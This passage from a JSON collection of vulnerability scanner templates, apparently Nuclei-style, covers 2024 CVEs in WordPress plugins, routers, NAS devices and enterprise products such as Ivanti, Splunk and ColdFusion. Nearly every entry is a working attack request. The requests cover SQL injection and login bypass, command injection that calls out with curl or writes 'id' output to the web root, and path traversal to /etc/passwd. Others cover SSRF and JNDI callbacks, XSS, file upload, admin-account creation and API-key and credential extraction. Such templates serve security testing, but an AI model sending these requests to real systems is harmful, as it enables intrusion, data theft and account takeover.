plugin\", \"success\\\":false\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6845","info":{"name":"SmartSearchWP < 2.4.6 - OpenAI Key Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/smartsearchwp\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/wdgpt/v1/api-key HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"key\": \"U2FsdGVkX1+X\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"api-key","regex":["\"([^\"]+)\""]}]}]},{"id":"CVE-2024-6289","info":{"name":"WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"WPS Hide Login\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?gf_page={{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), \"wp-login.php\")","contains(header,\"%2F%3Fgf_page%3D{{string}}&reauth=1\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-3922","info":{"name":"Dokan Pro <= 3.10.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Dokan product"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: {{Hostname}}\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302"],"condition":"and"}]}]},{"id":"CVE-2024-29895","info":{"name":"Cacti cmd_realtime.php - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-43160","info":{"name":"BerqWP <= 1.7.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/searchpro\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/optifer/v1/store-webp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimage=\"{{base64(num)}}\"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{num}}\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6922","info":{"name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /v1/proxy/test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"saasUrl\":\"{{interactsh-url}}/?param=one#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"message\":"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2024-1071","info":{"name":"WordPress Ultimate Member 2.1.3 - 2.8.2 \u2013 SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains_all(body_2, \"current_page\", \"total_pages\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([0-9a-z]+)\""],"internal":true}]}]},{"id":"CVE-2024-6646","info":{"name":"Netgear-WN604 downloadFile.php -  Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloadFile.php?file=config"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["system:basicSettings","system:staSettings"],"condition":"and"},{"type":"word","part":"content_type","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32736","info":{"name":"CyberPower < v2.8.3 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["\"code\":\"([0-9.]+)\""]},{"type":"word","part":"body","words":["\"results\":","{\"status\":\"finished"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"code\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-1183","info":{"name":"Gradio - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /file=http://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2024-3274","info":{"name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/info.cgi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Model=\", \"Build=\", \"Macaddr=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-7008","info":{"name":"Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)","severity":"medium"},"requests":[{"raw":["GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["window.location.href = \"/#book_id=TEST\";window.stop();alert(document.domain);//&panel=book_details"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5276","info":{"name":"Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /{{ctxpath}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"jsessionid","regex":["logon.jsp;jsessionid=([A-Z0-9]+)"],"internal":true}]},{"raw":["GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["logonAnonymous.do"],"internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"anonurl","regex":["href=\"(.*)\" class=\"btn btn-outline-primary\" id=\"logonAnonymousLink\""],"internal":true}]},{"raw":["GET {{anonurl}} HTTP/1.1\nHost: {{Hostname}}\n"]},{"raw":["GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1\nHost: {{Hostname}}\n"]},{"raw":["GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"extractors":[{"type":"regex","part":"body","group":1,"name":"fcweb_token","regex":["name=\"FCWEB.FORM.TOKEN\" value=\"([A-Za-z0-9]+)\""],"internal":true},{"type":"regex","part":"body","group":1,"name":"jsessionid2","regex":["logon.jsp;jsessionid=([A-Z0-9]+)"],"internal":true}]},{"raw":["POST /{{ctxpath}}/logon.do HTTP/1.1\nHost: {{Hostname}}\nCookie: JSESSIONID={{jsessionid2}}\nContent-Type: application/x-www-form-urlencoded\n\nFCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&\n"],"disable-cookie":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username/password are not correct","Your session timed out."],"negative":true},{"type":"word","part":"body","words":["<title>FileCatalyst Workflow Administration</title>","{{to_lower(username)}}"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-22319","info":{"name":"IBM Operational Decision Manager - JNDI Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"patchLevel\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-33288","info":{"name":"Prison Management System - SQL Injection Authentication Bypass","severity":"high"},"requests":[{"raw":["POST /Admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=\n","GET /Admin/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<p>Change Password</p>","<p>Logout</p>","Admin Dashboard | Prison Management system"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5420","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /device/description_en.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\u201c><script>alert(document.domain)</script>\" id=\"standort\"","Host name</label>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7854","info":{"name":"Woo Inquiry <= 0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/woo-inquiry\")"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=woo_wpinq_times_up&dbid=(SELECT(0)FROM(SELECT(SLEEP(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32238","info":{"name":"H3C ER8300G2-X - Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vtyname","vtypasswd","auxauthmode"],"condition":"and"},{"type":"word","part":"content_type","words":["application/x-unknown"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24763","info":{"name":"JumpServer < 3.10.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /{{paths}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"payloads":{"paths":["core/auth/login/?next=//oast.me","auth/login/?next=//oast.me","login/?next=//oast.me"]},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2024-8503","info":{"name":"VICIdial - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /vicidial/welcome.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Agent Login\",\"Timeclock\",\"Administration\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-20767","info":{"name":"Adobe ColdFusion - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1\nHost: {{Hostname}}\n","GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1\nHost: {{Hostname}}\nuuid: {{extracted_uuid}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'wddxPacket')","contains(header_2, 'application/json')","contains(body_2, '/bin/bash')"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"extracted_uuid","group":1,"regex":["<var name='uuid'><string>(.*)</string>"],"internal":true}]}]},{"id":"CVE-2024-24919","info":{"name":"Check Point Quantum Gateway - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /clients/MyCRL HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*","nobody:.*"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-8522","info":{"name":"LearnPress \u2013 WordPress LMS - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/learnpress\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=6","duration_2>=6"]}]}]},{"id":"CVE-2024-41810","info":{"name":"Twisted - Open Redirect & XSS","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"word","part":"response","words":["TWISTED_SESSION","[\"Twisted"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}?url=ws://example.com/\"><script>alert(document.domain)</script>"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["Location: ws://example.com/\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-5084","info":{"name":"Hash Form <= 1.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP /1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{md5(num)}}\n","GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2,\"success\",\"true\",\"url\") && status_code_2 == 200","contains(body_3,\"{{md5(num)}}\") && status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"ajax_nounce\":\"([0-9a-z]+)\",\"preview_img"],"internal":true}]}]},{"id":"CVE-2024-7593","info":{"name":"Ivanti vTM - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1\nHost: {{Hostname}}\n\n_form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["wizardtitletext"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /apps/zxtm/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {[RootURL]}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: {{RootURL}}/apps/zxtm/login.cgi\n\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"_form_submitted\"\n\nform\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_username\"\n\n{{username}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_password\"\n\n{{password}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_submit\"\n\nLogin\n------WebKitFormBoundarycznFUOqD0Y01A9B5--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: /apps/zxtm/","Set-Cookie: ZeusTMZAUTH=","Set-Cookie: ZeusTMZAUTHTIME="],"condition":"and"},{"type":"status","status":[302]}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-7339","info":{"name":"TVT DVR Sensitive Device - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /queryDevInfo HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["softwareVersion","eth0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2876","info":{"name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111\n"],"matchers":[{"type":"dsl","dsl":["duration>=4","status_code == 200","contains(header, \"application/json\")","contains_all(body, \"bulk_action\", \"_sent\", \"errortype\")"],"condition":"and"}]}]},{"id":"CVE-2024-32738","info":{"name":"CyberPower - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":\"finished\"","\"success\":","modifiedtime\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"modifiedtime\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-3495","info":{"name":"Wordpress Country State City Dropdown <=2.7.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+-\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"nonce\":\"(\\S*)\""],"internal":true}]}]},{"id":"CVE-2024-26331","info":{"name":"ReCrystallize Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Admin.aspx"],"headers":{"Cookie":"AdminUsername=admin"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ReCrystallize Server Administration","License Status:","System Info</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36991","info":{"name":"Splunk Enterprise - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /en-US/login HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Splunk Inc.\")"],"condition":"and","internal":true}]},{"raw":["GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2024-1208","info":{"name":"LearnDash LMS < 4.10.3 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"question_type\":","\"points_total\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28734","info":{"name":"Coda v.2024Q1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frameset cols=\"\"><frame src=\"javascript:alert(document.domain)\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2621","info":{"name":"Fujian Kelixin Communication - Command Injection","severity":"medium"},"requests":[{"raw":["@timeout 15s\nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"msg\\\":\",\"header\\\":\",\"code\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-29972","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account","severity":"critical"},"requests":[{"raw":["GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'result=0')"],"condition":"and"}]}]},{"id":"CVE-2024-8484","info":{"name":"REST API TO MiniProgram <= 4.7.1 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/rest-api-to-miniprogram\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /wp-json/watch-life-net/v1/comment/getcomments?order=DESC,(SELECT(1)FROM(SELECT(SLEEP(6)))a)--&postid=3&limit=1&page=1&page=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body, \"code\",\"success\",\"status\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-25852","info":{"name":"Linksys RE7000 - Command Injection","severity":"high"},"requests":[{"raw":["PUT /goform/AccessControl HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"AccessPolicy\":\"0\",\"AccessControlList\":\"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`\"}\n"]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1,\"result\",\"success\") && contains_all(body_2,\"PID\",\"USER\",\"VSZ\",\"STAT\",\"COMMAND\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-22024","info":{"name":"Ivanti Connect Secure - XXE","severity":"high"},"requests":[{"raw":["POST /dana-na/auth/saml-sso.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLRequest={{base64(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-8181","info":{"name":"Flowise <= 1.8.2 Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/apikey?/api/v1/ping HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nReferer: {{RootURL}}/document-stores\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiKey","apiSecret"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apiKey","part":"body","internal":false,"group":1,"regex":["\"apiKey\":\"([^\"]+)\""]}]}]},{"id":"CVE-2024-2389","info":{"name":"Progress Kemp Flowmon - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains(header, 'application/json') && contains(header, 'Flowmon')"],"condition":"and"}]}]},{"id":"CVE-2024-34257","info":{"name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/page/index.html\n\n{\n\"token\":\"\",\n\"apcliEncrypType\":\"`id>../{{file}}.txt`\",\n\"topicurl\":\"setWiFiExtenderConfig\"\n}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"success\": true"]},{"type":"regex","part":"body_2","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3850","info":{"name":"Uniview NVR301-04S2-P4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="],"condition":"and"},{"type":"word","part":"header","words":["NVRDVR"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4885","info":{"name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /NmAPI/RecurringReport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: http://tempuri.org/IRecurringReportServices/TestRecurringReport\n\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"><s:Body><TestRecurringReport xmlns=\"http://tempuri.org/\"><rr xmlns:a=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.RecurringReports.DataContracts\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"><a:AlternateHost i:nil=\"true\"/><a:Disabled>false</a:Disabled><a:EmailSettings xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:Authentication>None</b:Authentication><b:CredentialsId i:nil=\"true\"/><b:DirectoryPath>C:\\PROGRA~2\\Ipswitch\\WhatsUp\\Data\\ScheduledReports</b:DirectoryPath><b:Password/><b:Port>25</b:Port><b:SMTPServer/><b:SendFrom>WhatsUpGold@YourDomain.com</b:SendFrom><b:SendTo i:nil=\"true\"/><b:Subject>Emailing: Wireless Log</b:Subject><b:TimeoutSec>5</b:TimeoutSec><b:UseEncryptedConn>false</b:UseEncryptedConn><b:Username/></a:EmailSettings><a:ExportOptions><a:AuthorName>WhatsUp 